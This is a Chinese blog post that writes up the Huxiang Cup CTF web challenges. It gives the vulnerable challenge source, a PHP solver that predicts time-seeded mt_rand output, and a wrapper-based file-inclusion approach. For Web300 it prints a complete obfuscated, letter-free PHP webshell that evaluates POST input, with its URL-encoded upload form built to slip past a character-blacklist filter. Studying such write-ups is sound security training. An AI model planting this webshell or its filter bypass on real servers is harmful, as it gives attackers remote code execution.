Mochazz's blogHomeArchivesAboutRead
湖湘杯CTF-Web题解
|CTF竞赛训练

Web150

.index.php.swp源码如下

<?php
    error_reporting(0);
    $flag = "********************";
    echo "please input a rand_num !";
    function create_password($pw_length =  10){
        $randpwd = "";
        for ($i = 0; $i < $pw_length; $i++){
            $randpwd .= chr(mt_rand(100, 200));
        }
        return $randpwd;
    }

    session_start();
    mt_srand(time());
    $pwd=create_password();
    echo $pwd.'||';    

    if($pwd == $_GET['pwd']){
        echo "first";
        if($_SESSION['userLogin']==$_GET['login'])
            echo "Nice , you get the flag it is ".$flag ;
    }
    else{
        echo "Wrong!";
    }

    $_SESSION['userLogin']=create_password(32).rand();

?>
PHP解题代码如下 
<?php
    function create_password($pw_length =  10)
    {
        $randpwd = "";
        for ($i = 0; $i < $pw_length; $i++)
        {
            $randpwd .= chr(mt_rand(100, 200));
        }
        return $randpwd;
    }

    for($i=time();$i<time()+5;$i++)
    {
        mt_srand($i);
        $pwd=create_password();
        $curl=file_get_contents("http://127.0.0.1/demo.php?pwd=$pwd&login=");
        echo $curl.'<br>';
    }

?>


原理大概是这样的,mt_srand()和mt_rand()属于伪随机数,如果给mt_srand()使用了seed,则之后用st_rand()生成的数字是随机的,但是生成数据的顺序却是固定的,例如seed=9时,生成一串数字为9,6,4,4,5,9,8,6,8,0,不管你运行几次,会发现生成的随机数字都是9,6,4,4,5,9,8,6,8,0。

再回到这道题目上,我们只需要预判出之后的pwdb变量的值,之后一直提交即可。至于题目中的第二个判断条件,直接使用login=空即可,因为代码是按顺序执行的,然而$_SESSION['userLogin']是在判断之后才定义的,也就是说此时$_SESSION['userLogin']根本就还没定义,所以使用NULL绕过即可。PS:这个其实和SQL双查询注入很像

Web200

明显题目没出好,正规解题思路是利用filter伪协议读取源代码,然后使用phar伪协议结合文件包含获取flag。

Web300

<?php 
  ini_set("display_errors", "On"); 
  error_reporting(E_ALL | E_STRICT); 
  if(!isset($_GET['content'])){ 
     show_source(__FILE__); 
     die(); 
  } 
  function rand_string( $length ) { 
     $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";     
     $size = strlen( $chars ); 
     $str = ''; 
     for( $i = 0; $i < $length; $i++) { 
         $str .= $chars[ rand( 0, $size - 1 ) ]; 
     } 
     return $str; 
  } 
  $data = $_GET['content']; 
  $black_char = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`',  '|', '~');
  foreach ($black_char as $b) { 
     if (stripos($data, $b) !== false){ 
         die("关键字WAF"); 
     } 
  } 
  $filename=rand_string(0x20).'.php'; 
  $folder='uploads/'; 
  $full_filename = $folder.$filename; 
  if(file_put_contents($full_filename, '<?php '.$data)){ 
     echo "<a href='".$full_filename."'>shell</a></br>"; 
     echo "我的/flag,你读到了么"; 
  }
  else{ 
     echo "噢 噢,错了"; 
  }
?>

下面这个是绕WAF的一句话木马,直接通过url写入会失败,原因在于+号会被处理成空格,所以我们需要通过urlencode,将它urlencode写入即可

<?php 
  $_=''.[];$_=$_['+'=='_'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);//ASSERT($_POST[_]);
?>

urlencode之后如下

%24%5f%3d%27%27%2e%5b%5d%3b%24%5f%3d%24%5f%5b%27%2b%27%3d%3d%27%5f%27%5d%3b%24%5f%5f%5f%3d%24%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%5f%5f%3d%27%5f%27%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%5f%3d%24%5f%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%2b%2b%3b%24%5f%5f%5f%5f%2e%3d%24%5f%5f%3b%24%5f%3d%24%24%5f%5f%5f%5f%3b%24%5f%5f%5f%28%24%5f%5b%5f%5d%29%3b



参考
通过非数字和字符的方式实现PHP WebShell

Web400

不会做,也没找到WP

文章作者: Mochazz
文章链接: https://mochazz.github.io/2017/12/04/hxbctf_web/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Mochazz's blog
CTF